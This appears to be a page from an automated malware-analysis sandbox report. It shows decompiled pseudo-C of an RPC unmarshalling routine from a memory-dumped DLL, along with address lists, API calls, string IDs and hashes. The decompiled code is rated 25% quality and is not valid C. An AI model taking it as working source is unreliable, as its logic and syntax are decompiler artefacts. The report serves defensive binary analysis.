										__eax = E6EDA73D0(__ecx,  *(__ebp + 8) + 4, 4);
									}
									__eax =  *(__ebp + 8);
									__ecx =  *(__eax + 4);
									 *(__ebp - 0x20) =  *(__eax + 4);
									__edx =  *(__ebp + 8);
									if( *( *(__ebp + 8) + 0x34) == 0) {
										__ecx =  *(__ebp + 0x14);
										__edx =  *( *(__ebp + 0x14)) & 0x000000ff;
										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
											 *(__ebp + 8) = E6EDAAF00( *(__ebp + 8), 4);
										}
									} else {
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp + 8);
										__edx =  *(__ecx + 0x34);
										 *( *(__ebp + 8) + 4) =  *(__ecx + 0x34);
										__eax =  *(__ebp + 8);
										 *( *(__ebp + 8) + 0x34) = 0;
										 *(__ebp - 0x1c) = 1;
									}
									__ecx =  *(__ebp + 0x18) & 0x000000ff;
									__edx =  *(__ebp + 0x14);
									__eax =  *(__ebp + 0xc);
									__ecx =  *( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *(__ebp - 0x20);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAB580( *(__ebp + 8),  *(__ebp - 0x20),  *(__ebp + 0xc),  *( *(__ebp + 0xc)),  *(__ebp + 0x14),  *(__ebp + 0x18) & 0x000000ff);
									if( *(__ebp - 0x1c) == 0) {
										L28:
										__edx =  *(__ebp + 0x10);
										__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
										if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
											__edx =  *(__ebp + 0x10);
											__edx =  *(__ebp + 0x10) + 4;
											 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
										} else {
											__ecx =  *(__ebp + 0x14);
											__ecx =  *(__ebp + 0x14) + 4;
											 *(__ebp + 0x14) = __ecx;
										}
										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
										while(1) {
											L47:
											 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
											goto L1;
										}
									} else {
										do {
											L23:
											__edx =  *(__ebp + 8);
											__eax =  *(__edx + 0x14);
											_push( *(__edx + 0x14));
											__ecx =  *(__ebp + 8);
											__edx =  *( *(__ebp + 8));
											__eax =  *(__ebp + 8);
											 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
											_push( *(__eax + 4) -  *(__edx + 8));
											_push("buffer=%d/%d\n");
											0x6eda0000();
											__esp = __esp + 0xc;
											__edx =  *(__ebp + 8);
											__eax =  *( *(__ebp + 8));
											__ecx =  *(__eax + 8);
											__edx =  *(__ebp + 8);
											__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
											__eax =  *(__ebp + 8);
											if( *( *(__ebp + 8) + 4) > __ecx) {
												__ecx =  *(__ebp + 8);
												__edx =  *( *(__ebp + 8));
												__eax =  *(__edx + 8);
												__ecx =  *(__ebp + 8);
												__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
												__edx =  *(__ebp + 8);
												__ecx =  *(__edx + 4);
												__ecx =  *(__edx + 4) - __eax;
												_push( *(__edx + 4) - __eax);
												_push("buffer overflow %d bytes\n");
												0x6eda0000();
												__esp = __esp + 8;
											}
											__edx = 0;
										} while (0 != 0);
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp + 8);
										__edx =  *(__ecx + 4);
										 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp - 0x20);
										 *( *(__ebp + 8) + 4) = __ecx;
										__edx =  *(__ebp + 0x14);
										__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
											__ecx =  *(__ebp + 8);
											__eax = E6EDAAF00( *(__ebp + 8), 4);
										}
										goto L28;
									}
								case 8:
									L32:
									__ecx =  *(__ebp - 0x10);
									__edx = __ebp + 0xc;
									__eax = E6EDA7480(__ecx, __ebp + 0xc, __ecx, 2);
									while(1) {
										L47:
										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 9:
									L33:
									__eax =  *(__ebp - 0x10);
									__ecx = __ebp + 0xc;
									__eax = E6EDA7480(__ecx, __ecx,  *(__ebp - 0x10), 4);
									while(1) {
										L47:
										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 0xa:
									L34:
									__edx =  *(__ebp - 0x10);
									__ebp + 0xc = E6EDA7480(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 8);
									while(1) {
										L47:
										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 0xb:
									L35:
									__ecx =  *(__ebp + 0x10);
									 *( *(__ebp + 0x10)) & 0x000000ff = ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
									 *(__ebp + 0xc) = E6EDB0770( *(__ebp + 0xc), 0, ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c);
									__ecx =  *(__ebp + 0x10);
									__edx =  *( *(__ebp + 0x10)) & 0x000000ff;
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 0xc:
									L36:
									1 = 1 << 0;
									__eax =  *(__ebp + 0x10);
									 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
									 *(__ebp + 0xc) = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									__eax =  *(__ebp + 0x10);
									 *( *(__ebp + 0x10)) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
									 *(__ebp - 8) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
									__edx =  *(__ebp - 8);
									__eax =  *(__ebp + 8);
									 *(__ebp - 0x18) = E6EDAE3A0( *(__ebp + 8),  *(__ebp - 8));
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp - 0x18);
									_push( *(__ebp - 0x18));
									_push("embedded complex (size=%d) => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__eax =  *(__ebp + 0x18) & 0x000000ff;
									if(( *(__ebp + 0x18) & 0x000000ff) != 0) {
										__ecx =  *(__ebp - 0x18);
										__edx =  *(__ebp + 0xc);
										__eax = E6EDB0770( *(__ebp + 0xc), 0,  *(__ebp - 0x18));
									}
									__eax =  *(__ebp - 8);
									__ecx =  *( *(__ebp - 8)) & 0x000000ff;
									__ecx =  *( *(__ebp - 8)) & 0x7f;
									__edx =  *(0x6edbb418 + __ecx * 4);
									 *(__ebp - 0x14) =  *(0x6edbb418 + __ecx * 4);
									if( *(__ebp - 0x14) == 0) {
										__edx =  *(__ebp - 8);
										__eax =  *( *(__ebp - 8)) & 0x000000ff;
										_push( *( *(__ebp - 8)) & 0x000000ff);
										_push("no unmarshaller for embedded type %02x\n");
										0x6eda0000();
										__esp = __esp + 8;
									} else {
										__eax =  *(__ebp - 8);
										__ecx =  *( *(__ebp - 8)) & 0x000000ff;
										if(( *( *(__ebp - 8)) & 0x000000ff) != 0x2f) {
											_push(0);
											__edx =  *(__ebp - 8);
											_push( *(__ebp - 8));
											__eax = __ebp + 0xc;
											_push(__ebp + 0xc);
											__ecx =  *(__ebp + 8);
											_push( *(__ebp + 8));
											__eax =  *(__ebp - 0x14)();
										} else {
											_push(0);
											__edx =  *(__ebp - 8);
											_push( *(__ebp - 8));
											__eax =  *(__ebp + 0xc);
											_push( *(__ebp + 0xc));
											__ecx =  *(__ebp + 8);
											_push( *(__ebp + 8));
											__eax =  *(__ebp - 0x14)();
										}
									}
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) +  *(__ebp - 0x18);
									 *(__ebp + 0xc) = __ecx;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									goto L1;
								case 0xd:
									L45:
									while(1) {
										L47:
										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 0xe:
									L10:
									__edx = __ebp - 0x24;
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8), __ebp - 0x24, 4);
									__ecx =  *(__ebp + 0xc);
									__edx =  *(__ebp - 0x24);
									 *( *(__ebp + 0xc)) =  *(__ebp - 0x24);
									__eax =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									__edx =  *__ecx;
									_push( *__ecx);
									_push("int3264=%ld => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									while(1) {
										L47:
										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 0xf:
									goto L0;
								case 0x10:
									goto L46;
							}
						}
						return  *(_t220 + 0xc);
					}
				}
			}






                                                                                                0x6eda96e7
                                                                                                0x6eda96e7
                                                                                                0x6eda96e7
                                                                                                0x6eda96f1
                                                                                                0x6eda96ff
                                                                                                0x6eda9710
                                                                                                0x6eda9715
                                                                                                0x6eda971e
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda956c
                                                                                                0x6eda9581
                                                                                                0x6eda958a
                                                                                                0x6eda9594
                                                                                                0x6eda9ab7
                                                                                                0x6eda9ac3
                                                                                                0x6eda9ac8
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x6eda9acb
                                                                                                0x6eda959a
                                                                                                0x6eda959d
                                                                                                0x6eda95a4
                                                                                                0x00000000
                                                                                                0x6eda95ab
                                                                                                0x6eda95b5
                                                                                                0x6eda95c0
                                                                                                0x6eda95c7
                                                                                                0x6eda95c8
                                                                                                0x6eda95cd
                                                                                                0x6eda95d2
                                                                                                0x6eda95db
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda95e3
                                                                                                0x6eda95e5
                                                                                                0x6eda95ed
                                                                                                0x6eda95f5
                                                                                                0x6eda95f8
                                                                                                0x6eda95f9
                                                                                                0x6eda95fc
                                                                                                0x6eda95ff
                                                                                                0x6eda9600
                                                                                                0x6eda9605
                                                                                                0x6eda960a
                                                                                                0x6eda960d
                                                                                                0x6eda9610
                                                                                                0x6eda9613
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9671
                                                                                                0x6eda9673
                                                                                                0x6eda967b
                                                                                                0x6eda9683
                                                                                                0x6eda9686
                                                                                                0x6eda9687
                                                                                                0x6eda968a
                                                                                                0x6eda968c
                                                                                                0x6eda968d
                                                                                                0x6eda9692
                                                                                                0x6eda9697
                                                                                                0x6eda969a
                                                                                                0x6eda969d
                                                                                                0x6eda96a0
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9726
                                                                                                0x6eda9728
                                                                                                0x6eda972c
                                                                                                0x6eda9730
                                                                                                0x6eda9738
                                                                                                0x6eda973b
                                                                                                0x6eda973c
                                                                                                0x6eda973f
                                                                                                0x6eda9743
                                                                                                0x6eda9746
                                                                                                0x6eda974b
                                                                                                0x6eda9750
                                                                                                0x6eda9755
                                                                                                0x6eda9758
                                                                                                0x6eda975b
                                                                                                0x6eda975e
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9766
                                                                                                0x6eda9768
                                                                                                0x6eda9770
                                                                                                0x6eda9778
                                                                                                0x6eda977b
                                                                                                0x6eda977c
                                                                                                0x6eda977f
                                                                                                0x6eda9782
                                                                                                0x6eda9783
                                                                                                0x6eda9785
                                                                                                0x6eda9786
                                                                                                0x6eda978b
                                                                                                0x6eda978e
                                                                                                0x6eda978f
                                                                                                0x6eda9794
                                                                                                0x6eda9799
                                                                                                0x6eda979f
                                                                                                0x6eda97a2
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda97aa
                                                                                                0x6eda97ac
                                                                                                0x6eda97b0
                                                                                                0x6eda97b4
                                                                                                0x6eda97bc
                                                                                                0x6eda97bf
                                                                                                0x6eda97c0
                                                                                                0x6eda97c3
                                                                                                0x6eda97c6
                                                                                                0x6eda97ca
                                                                                                0x6eda97cf
                                                                                                0x6eda97d4
                                                                                                0x6eda97d9
                                                                                                0x6eda97dc
                                                                                                0x6eda97df
                                                                                                0x6eda97e2
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda961b
                                                                                                0x6eda961d
                                                                                                0x6eda9625
                                                                                                0x6eda962d
                                                                                                0x6eda9631
                                                                                                0x6eda9634
                                                                                                0x6eda9636
                                                                                                0x6eda9639
                                                                                                0x6eda963a
                                                                                                0x6eda963d
                                                                                                0x6eda963f
                                                                                                0x6eda9640
                                                                                                0x6eda9645
                                                                                                0x6eda964a
                                                                                                0x6eda964d
                                                                                                0x6eda9656
                                                                                                0x6eda9658
                                                                                                0x6eda965d
                                                                                                0x6eda965d
                                                                                                0x6eda9663
                                                                                                0x6eda9663
                                                                                                0x6eda9666
                                                                                                0x6eda9669
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda97ea
                                                                                                0x6eda97ea
                                                                                                0x6eda97f1
                                                                                                0x6eda97f4
                                                                                                0x6eda97f5
                                                                                                0x6eda97fa
                                                                                                0x6eda97ff
                                                                                                0x6eda9802
                                                                                                0x6eda9805
                                                                                                0x6eda980b
                                                                                                0x6eda980d
                                                                                                0x6eda9810
                                                                                                0x6eda9810
                                                                                                0x6eda9813
                                                                                                0x6eda9816
                                                                                                0x6eda981c
                                                                                                0x6eda9823
                                                                                                0x6eda9827
                                                                                                0x6eda982c
                                                                                                0x6eda982f
                                                                                                0x6eda9832
                                                                                                0x6eda9835
                                                                                                0x6eda9838
                                                                                                0x6eda983f
                                                                                                0x6eda9860
                                                                                                0x6eda9863
                                                                                                0x6eda9869
                                                                                                0x6eda9871
                                                                                                0x6eda9876
                                                                                                0x6eda9841
                                                                                                0x6eda9841
                                                                                                0x6eda9844
                                                                                                0x6eda9847
                                                                                                0x6eda984a
                                                                                                0x6eda984d
                                                                                                0x6eda9850
                                                                                                0x6eda9857
                                                                                                0x6eda9857
                                                                                                0x6eda9879
                                                                                                0x6eda987e
                                                                                                0x6eda9882
                                                                                                0x6eda9885
                                                                                                0x6eda9888
                                                                                                0x6eda988c
                                                                                                0x6eda9890
                                                                                                0x6eda9894
                                                                                                0x6eda98a0
                                                                                                0x6eda9935
                                                                                                0x6eda9935
                                                                                                0x6eda9938
                                                                                                0x6eda993e
                                                                                                0x6eda994b
                                                                                                0x6eda994e
                                                                                                0x6eda9951
                                                                                                0x6eda9940
                                                                                                0x6eda9940
                                                                                                0x6eda9943
                                                                                                0x6eda9946
                                                                                                0x6eda9946
                                                                                                0x6eda9957
                                                                                                0x6eda995a
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a9
                                                                                                0x6eda98ac
                                                                                                0x6eda98ad
                                                                                                0x6eda98b0
                                                                                                0x6eda98b2
                                                                                                0x6eda98b8
                                                                                                0x6eda98bb
                                                                                                0x6eda98bc
                                                                                                0x6eda98c1
                                                                                                0x6eda98c6
                                                                                                0x6eda98c9
                                                                                                0x6eda98cc
                                                                                                0x6eda98ce
                                                                                                0x6eda98d1
                                                                                                0x6eda98d4
                                                                                                0x6eda98d7
                                                                                                0x6eda98dd
                                                                                                0x6eda98df
                                                                                                0x6eda98e2
                                                                                                0x6eda98e4
                                                                                                0x6eda98e7
                                                                                                0x6eda98ea
                                                                                                0x6eda98ed
                                                                                                0x6eda98f0
                                                                                                0x6eda98f3
                                                                                                0x6eda98f5
                                                                                                0x6eda98f6
                                                                                                0x6eda98fb
                                                                                                0x6eda9900
                                                                                                0x6eda9900
                                                                                                0x6eda9903
                                                                                                0x6eda9903
                                                                                                0x6eda9907
                                                                                                0x6eda990a
                                                                                                0x6eda990d
                                                                                                0x6eda9910
                                                                                                0x6eda9913
                                                                                                0x6eda9916
                                                                                                0x6eda9919
                                                                                                0x6eda991c
                                                                                                0x6eda991f
                                                                                                0x6eda9925
                                                                                                0x6eda9929
                                                                                                0x6eda992d
                                                                                                0x6eda9932
                                                                                                0x00000000
                                                                                                0x6eda9925
                                                                                                0x00000000
                                                                                                0x6eda9962
                                                                                                0x6eda9964
                                                                                                0x6eda9968
                                                                                                0x6eda996c
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9979
                                                                                                0x6eda997b
                                                                                                0x6eda997f
                                                                                                0x6eda9983
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9990
                                                                                                0x6eda9992
                                                                                                0x6eda999a
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda99a7
                                                                                                0x6eda99a7
                                                                                                0x6eda99ad
                                                                                                0x6eda99b7
                                                                                                0x6eda99bf
                                                                                                0x6eda99c2
                                                                                                0x6eda99c5
                                                                                                0x6eda99c8
                                                                                                0x6eda99cc
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda99d4
                                                                                                0x6eda99d9
                                                                                                0x6eda99dc
                                                                                                0x6eda99e3
                                                                                                0x6eda99e6
                                                                                                0x6eda99ec
                                                                                                0x6eda99ef
                                                                                                0x6eda99f2
                                                                                                0x6eda99f8
                                                                                                0x6eda99fb
                                                                                                0x6eda99fe
                                                                                                0x6eda9a02
                                                                                                0x6eda9a0e
                                                                                                0x6eda9a11
                                                                                                0x6eda9a14
                                                                                                0x6eda9a15
                                                                                                0x6eda9a18
                                                                                                0x6eda9a19
                                                                                                0x6eda9a1e
                                                                                                0x6eda9a23
                                                                                                0x6eda9a26
                                                                                                0x6eda9a2c
                                                                                                0x6eda9a2e
                                                                                                0x6eda9a34
                                                                                                0x6eda9a38
                                                                                                0x6eda9a3d
                                                                                                0x6eda9a40
                                                                                                0x6eda9a43
                                                                                                0x6eda9a46
                                                                                                0x6eda9a49
                                                                                                0x6eda9a50
                                                                                                0x6eda9a57
                                                                                                0x6eda9a8a
                                                                                                0x6eda9a8d
                                                                                                0x6eda9a90
                                                                                                0x6eda9a91
                                                                                                0x6eda9a96
                                                                                                0x6eda9a9b
                                                                                                0x6eda9a59
                                                                                                0x6eda9a59
                                                                                                0x6eda9a5c
                                                                                                0x6eda9a62
                                                                                                0x6eda9a77
                                                                                                0x6eda9a79
                                                                                                0x6eda9a7c
                                                                                                0x6eda9a7d
                                                                                                0x6eda9a80
                                                                                                0x6eda9a81
                                                                                                0x6eda9a84
                                                                                                0x6eda9a85
                                                                                                0x6eda9a64
                                                                                                0x6eda9a64
                                                                                                0x6eda9a66
                                                                                                0x6eda9a69
                                                                                                0x6eda9a6a
                                                                                                0x6eda9a6d
                                                                                                0x6eda9a6e
                                                                                                0x6eda9a71
                                                                                                0x6eda9a72
                                                                                                0x6eda9a72
                                                                                                0x6eda9a88
                                                                                                0x6eda9a9e
                                                                                                0x6eda9aa1
                                                                                                0x6eda9aa4
                                                                                                0x6eda9aaa
                                                                                                0x6eda9aad
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda9ab5
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda96a8
                                                                                                0x6eda96aa
                                                                                                0x6eda96b2
                                                                                                0x6eda96ba
                                                                                                0x6eda96bd
                                                                                                0x6eda96c0
                                                                                                0x6eda96c2
                                                                                                0x6eda96c5
                                                                                                0x6eda96c6
                                                                                                0x6eda96c9
                                                                                                0x6eda96cb
                                                                                                0x6eda96cc
                                                                                                0x6eda96d1
                                                                                                0x6eda96d6
                                                                                                0x6eda96dc
                                                                                                0x6eda96df
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda95a4
                                                                                                0x6eda9adf
                                                                                                0x6eda9adf
                                                                                                0x6eda9acb

                                                                                                APIs
                                                                                                  • Part of subcall function 6EDAAFA0: RpcRaiseException.RPCRT4(000006F7,?,?,?,00000001,?,?,?,?,?,?,6EDA3C70,?,00000000), ref: 6EDAAFE9
                                                                                                  • Part of subcall function 6EDAAFA0: _memmove.LIBCMT ref: 6EDAB016
                                                                                                • RpcRaiseException.RPCRT4(000006F5), ref: 6EDA965D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise$_memmove
                                                                                                • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d => %p$double=%f => %p$enum16=%d => %p$float=%f => %p$long=%d => %p$longlong=%s => %p$pointer => %p$short=%d => %p$uint3264=%ld => %p
                                                                                                • API String ID: 2890701851-2779847962
                                                                                                • Opcode ID: 91dc30ace4578db897f5f5b124e17652c052e7b06e83424102b8971a37f79eec
                                                                                                • Instruction ID: c90cdc3e8ddc39ef3e113c03e33589df25f4a8d02b3c313c200274e5c2a8ffda
                                                                                                • Opcode Fuzzy Hash: 91dc30ace4578db897f5f5b124e17652c052e7b06e83424102b8971a37f79eec
                                                                                                • Instruction Fuzzy Hash: 48D139B5A00108AFCB04CF99E890EEA77B9AF89314F04C519FA594F345E731EA51CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA96A8, Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 320COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA96A8(void* __eflags) {
				void* _t220;
				void* _t222;
				void* _t224;

				L0:
				while(1) {
					L0:
					E6EDAAFA0( *((intOrPtr*)(_t220 + 8)), _t220 - 0x24, 4);
					 *( *(_t220 + 0xc)) =  *(_t220 - 0x24);
					0x6eda0000("int3264=%ld => %p\n",  *( *(_t220 + 0xc)),  *(_t220 + 0xc));
					_t224 = _t222 + 0x18;
					 *(_t220 + 0xc) =  &(( *(_t220 + 0xc))[2]);
					while(1) {
						L47:
						 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
						L1:
						while(( *( *(_t220 + 0x10)) & 0x000000ff) != 0x5b) {
							 *(_t220 - 0xc) =  *( *(_t220 + 0x10)) & 0x000000ff;
							 *(_t220 - 0xc) =  *(_t220 - 0xc) - 1;
							if( *(_t220 - 0xc) > 0xb8) {
								L46:
								0x6eda0000("unhandled format %d\n",  *( *(_t220 + 0x10)) & 0x000000ff);
								_t224 = _t224 + 8;
								while(1) {
									L47:
									 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
									goto L1;
								}
							}
							L3:
							_t16 =  *(_t220 - 0xc) + 0x6eda9b24; // 0xcccccc0f
							switch( *((intOrPtr*)(( *_t16 & 0x000000ff) * 4 +  &M6EDA9AE0))) {
								case 0:
									L4:
									E6EDAAFA0( *((intOrPtr*)(_t220 + 8)),  *(_t220 + 0xc), 1);
									_push( *(_t220 + 0xc));
									_push( *( *(_t220 + 0xc)) & 0x0000ffff);
									_push("byte=%d => %p\n");
									0x6eda0000();
									_t224 = _t224 + 0x18;
									 *(_t220 + 0xc) =  &(( *(_t220 + 0xc))[0]);
									L47:
									 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
									goto L1;
								case 1:
									L5:
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 2);
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
									_push( *( *(__ebp + 0xc)) & 0x0000ffff);
									_push("short=%d => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 2;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 2:
									L9:
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("long=%d => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 3:
									L11:
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									asm("cvtss2sd xmm0, [eax]");
									__esp = __esp - 8;
									asm("movsd [esp], xmm0");
									_push("float=%f => %p\n");
									0x6eda0000();
									__esp = __esp + 0x10;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 4:
									L12:
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *(__edx + 4);
									_push(__eax);
									__ecx =  *__edx;
									_push(__ecx);
									0x6eda0000();
									__esp = __esp + 8;
									_push(__eax);
									_push("longlong=%s => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
									while(1) {
										L47:
										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 5:
									L13:
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									__esp = __esp - 8;
									asm("movsd xmm0, [eax]");
									asm("movsd [esp], xmm0");
									_push("double=%f => %p\n");
									0x6eda0000();
									__esp = __esp + 0x10;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 8;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
